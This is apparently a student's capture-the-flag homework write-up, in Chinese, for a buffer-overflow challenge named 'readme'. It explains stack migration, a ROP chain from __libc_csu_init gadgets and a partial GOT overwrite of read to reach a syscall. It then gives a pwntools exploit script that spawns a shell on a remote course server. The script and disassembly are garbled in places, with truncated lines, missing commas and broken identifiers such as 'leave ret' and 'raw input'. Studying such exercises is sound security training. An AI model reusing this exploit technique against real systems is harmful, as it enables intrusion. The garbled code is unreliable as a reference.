Software Security Hw03 - readme

```
int main(){
char buf[0x20];
setvbuf(stdout,0,_IONBF,0);
printf("Read your input:");
read(0,buf,0x30);
return 0;
}
```

本題一開始可以利用overflow來控制rbp以及return address,我們利用main中read到rbp-0x20,做進一步的寫值

```
0x40062b:
lea rax, [rbp-0x20]
mov edx, 0x30
```

mov rsi, rax

mov edi, 0
call <read@plt>

第一次read的時候將rbp寫成buf1, ret 寫成 0x40062b buf1-0x20的前20byte任意值, 在buf1 寫入buf2的address, buf1+8寫入0x40062b

之後我們便可以對buf2寫入,在buf2-0x20前20byte寫入我們要的rop chain 之後再寫入buf1的address以及0x40062b這樣子我們就可以不斷在buf1跟buf2中間做stack migration,依序把rop chain寫到buf2的位置

rop chain 可以利用 __libc_csu_init 中的block進行操作

```
0x00000000000400690 <+64>: mov rdx,r13
0x00000000000400693 <+67>: mov rsi,r14
0x00000000000400696 <+70>: mov edi,r15d
0x00000000000400699 <+73>: call QWORD PTR [r12+rbx*8]
```

```
0x00000000004006aa <+90>:
                                      rbx
                              pop
0x00000000004006ab <+91>:
                              pop
                                      rbp
0x000000000004006ac <+92>:
                                      r12
                              pop
0x00000000004006ae <+94>:
                              pop
                                      r13
0x00000000004006b0 <+96>:
                                      r14
                              pop
0x00000000004006b2 <+98>:
                                      r15
                              pop
0x00000000004006b4 <+100>:
                              ret
```

另外我們可以發現在libc read funtion裡面可以看到

0x00007ffff7b04220 <+0>: cmp DWORD PTR [rip+0x2d2519],0x0 0x00007ffff7b04227 <+7>: jne 0x7ffff7b04239 <read+25>

0x00007ffff7b04229 <+0>: mov eax,0x0

0x00007ffff7b0422e <+5>: syscall

由於aslr後的最後1.5byte是固定的 我們可以利用read,將read的got直接改寫道read中syscall的位置

這樣我們就有Syscall 的 gadget 可以使用了 於是再利用上面提到的gadget, leak出libc的位置之後 將read got寫回原本的位置,我們就能繼續控制rax來使用syscall execve來launch shell了

以下為 exploit script

```
#!/usr/bin/env python
from pwn import *
context.arch = 'amd64'
r = remote('csie.ctf.tw', 10135)
# r = process('./readme')
r.recvuntil(':')
reset_eax_leave_ret = 0x400641
leave ret = 0x400646
read_to_buf = 0x40062b
# mov rdx, r13
# mov rsi, r14
# mov rdi, r15
# call [r12+rbx*8]
alter_r12_r13_r15_call = 0x400690
pop_rbx_rbp_r12_r13_r14_r15 = 0x4006aa
read plt = 0x4004c0
read got = 0x601020
buf1 = 0x602000 - 0x800
buf2 = buf1 + 0x100
buf3 = buf1 - 0x100
rop = flat([buf1,
    pop_rbx_rbp_r12_r13_r14_r15, 0, 1, read_got, 1, read_got, 0, alter_r12_r13_r15_cal
    0, 0, 1, read_got, 8, read_got, 1, alter_r12_r13_r15_call,
    0, 0, buf2+0xa0, 0, 0, 0, 0, reset_eax_leave_ret,
    pop_rbx_rbp_r12_r13_r14_r15, 0, 1, read_got, 1, read_got, 0, alter_r12_r13_r15_cal
    0, 0, 1, read_got, 0x10, buf3, 0, alter_r12_r13_r15_call,
    0, 0, 1, read_got, 59, buf1, 0, alter_r12_r13_r15_call,
    0, 0, buf1, buf3+8, 0, 0, buf3, alter r12 r13 r15 call,
    0, 0, 0])
print "rop1_length:", hex(len(rop))
payload = flat(['A'*0x20, buf1, read_to_buf]) # read to buf-0x20, mov rsp to buf
r.send(payload)
for i in range(0, 15):
    # payload to buf1-0x20 and will mov rsp to buf-0x20
    payload = flat(['A'*0x20, buf2+i*0x20, read_to_buf])
    r.send(payload)
    payload = flat([ rop[i*0x20:(i+1)*0x20], buf1, read_to_buf])
    r.send(payload)
raw input('#')
payload = flat(['A'*0x20, buf2-0x20, leave_ret])
```

```
r.send(payload)
r.send('\x2e')
r.send('\x20')
read_addr = u64(r.recv(8)) - 0xe
r.send('/bin/sh\x00' + p64(read_addr + 0xe))
r.send('A'*59)
r.interactive()
```

https://hackmd.io/OwJgRmIGwCwgtAEwMYwIzxgMwAw3gIYDMaw8yBMArCDgVVBQJxA=?view